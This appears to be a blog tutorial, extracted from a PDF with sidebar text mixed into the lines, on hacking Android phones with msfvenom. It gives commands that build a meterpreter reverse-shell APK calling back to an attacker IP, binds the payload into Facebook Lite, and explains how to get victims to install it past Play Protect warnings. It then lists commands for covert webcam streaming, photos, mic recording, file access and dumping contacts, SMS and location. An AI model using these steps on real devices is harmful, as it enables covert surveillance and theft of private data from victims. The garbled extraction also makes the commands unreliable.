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Android Hacking Using Msfvenom

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Android Hacking Using Msfvenom

Nowadays, most of the user base has shifted to mobile phones. People are
not only using their smartphones for calls, and sending SMS but also
beyond that. Other activities include web browsing, socializing,
photography, and much more. Android hacking using msfvenom is one of 
the simplest methods to hack android phones.

Android Market Coverage

Most of the users choose Android phones compared to other ones.
Android has been so successful that it already captures 80% of the
market share. This gure will rise to 90% by 2022 as per the expectation.
Having a huge user base obviously attracts the hackers and there have
been many experiments for android hacking. Every day, vendors release
security updates to patch the devices. Similarly, exploit developers
develop and release the exploits.

In this blog, you will learn how android hacking is performed so you can
practice that on your own. Also, everything you learn here is for
educational purposes and not for any malicious purposes.

Android Hacking Using Msfvenom

Resources How to get a security clearance?
Required resources are as follows
DevSecOps Tutorial, Tools and Bene ts

Android Phone (I’m using Huawei P20 Lite) OR Android Emulator Top 10 Commonly Overlooked Privacy
Kali Machine Concerns

What is a Cloning Attack?

Setting Up Android Phone
Since we will be experimenting the Android Hacking locally, so it is BECOME A MEMBER
important to have both phone and kali machine on the same network.

Creating the payload

Android hacking has multiple ways. The common method is to install APK
on the phone. The attacker can develop an Android Application with the
required malicious intent and get that installed into the victim’s phone.
But if someone doesn’t know how to develop an application can easily use
msfvenom. Android hacking using msfvenom, you can create a malicious
APK and inject the android payload into it. Thus serving the same

Using msfvenom
msfvenom is a command-line utility combining the msfpayloads and
msfencode into a single framework. It is used to create payloads in
multiple output formats for multiple target architectures and operating

You can use the following command to create a malicious APK using

sudo msfvenom --platform android -a java -p Android Hacking Using

android/meterpreter/reverse_tcp LHOST=<ATTACKER_IP> Msfvenom
LPORT=<PORT> -f raw -o malicious.apk

This will create an APK which does nothing which could be suspicious. To
overcome this, we can bind the payload to an existing APK like Facebook, How to get a security
Instagram, etc. For binding to an existing APK we can slightly change the clearance?
above command as follows

sudo msfvenom --platform android -a java -p DevSecOps Tutorial,

android/meterpreter/reverse_tcp LHOST=<ATTACKER_IP> Tools and Bene ts
LPORT=<PORT> -x existing.apk -f raw -o malicious.apk

Command Explanation Top 10 Commonly

platform ag speci es the target device platform which will be Overlooked Privacy
android in this case Concerns
a ag speci es the architecture
p ag speci es the payload that the APK will be bonded with. Since
What is a Cloning
we want to get the reverse shell through TCP, we choose the
payload accordingly
LHOST is set to the attacker’s IP
LPORT is set to the port at which the attacker will be listening for
reverse shells
f ag speci es the format of the output ETHICAL HACKING PRACTICE TESTS
x ag speci es the existing APK
o ag speci es the output location at which APK will be created
CEH Practice Test

Ethical Hacking Practice Test 7

Payload Binding with Facebook Lite
CEH Certi cation Overview
For the purpose of this demo, we will use Facebook Lite APK to bind our
Ethical Hacking Practice Test 6 – Footprinting
reverse shell payload to it.
Fundamentals Level1

CEH Practice Test 5 – Footprinting

Download the Facebook Lite APK from apkpure
Fundamentals Level 0
Use the following command to bind the APK to payload

sudo msfvenom --platform android -a java -p

android/meterpreter/reverse_tcp -x Facebook\\ LHOST=
LPORT=8888 -o maliciousFB.apk

Sharing APK
You can share the APK with the victim through multiple channels
including Whatsapp, website, direct sending, etc.

I am using a simple python server to start the HTTP server and access it
from my phone to download the APK. For this start the server as shown

Now open the browser on your phone and type in the IP of the kali
machine (attacker) with port 8000 to download the APK as shown below

Installing APK
After downloading the APK, tap it to install it on the phone.

You might have to do some social engineering to make the victim install
the application accept all of the permissions and ignore the warnings.

First, it will ask for the permissions as shown below

Tap on Install and it will show play protect warning as shown below

Tap on Install Anyway to install the application. After that, you might see a
security warning as shown below

Tap on ignore and you are all set to go.

Getting Reverse Shell

Now as everything is set, you need to start the msfconsole to use multi
handler and con gure the options according to the payload and then run
as shown below

Now on the android phone, tap the installed application icon. As soon you
will tap, a connection will be received in metasploit as shown below

Exploring Features
After getting the shell, we can explore multiple features listed below

System Information
Use sysinfo command to get the android device information

Webcam Stream
We can start webcam stream for the front as well as the back camera.

For the back camera, we can simply use webcam_stream command as

shown below

For the front camera, use webcam_stream -i 2 command.

Webcam Snapshot
You can easily take photos using webcam_snap command

Similarly, for the front camera, you can use webcam_snap -i 2

You can list the installed applications on the phone using app_list

Copy the package name and use app_run command to run it on the phone

Mic Record
You can use record_mic -d SECONDS command to record the audio from
the mic provided the seconds. The seconds’ value should be doubled to
record the desired time length. i.e. if you want to record for 5 seconds, put
in 10 as the value of seconds.

You can then use any audio player to listen to the recording.

File System Access

You have the access to the full le system to which you can upload les,
download les and read contents of les as shown below

Other Functions & Features

There is a list of other features that you can try including some of the
below mentioned

Contacts Dumping
SMS Dumping
Call Logs Dumping
Get Geo Location
Get Environment
Hide the application
Check Root Phone

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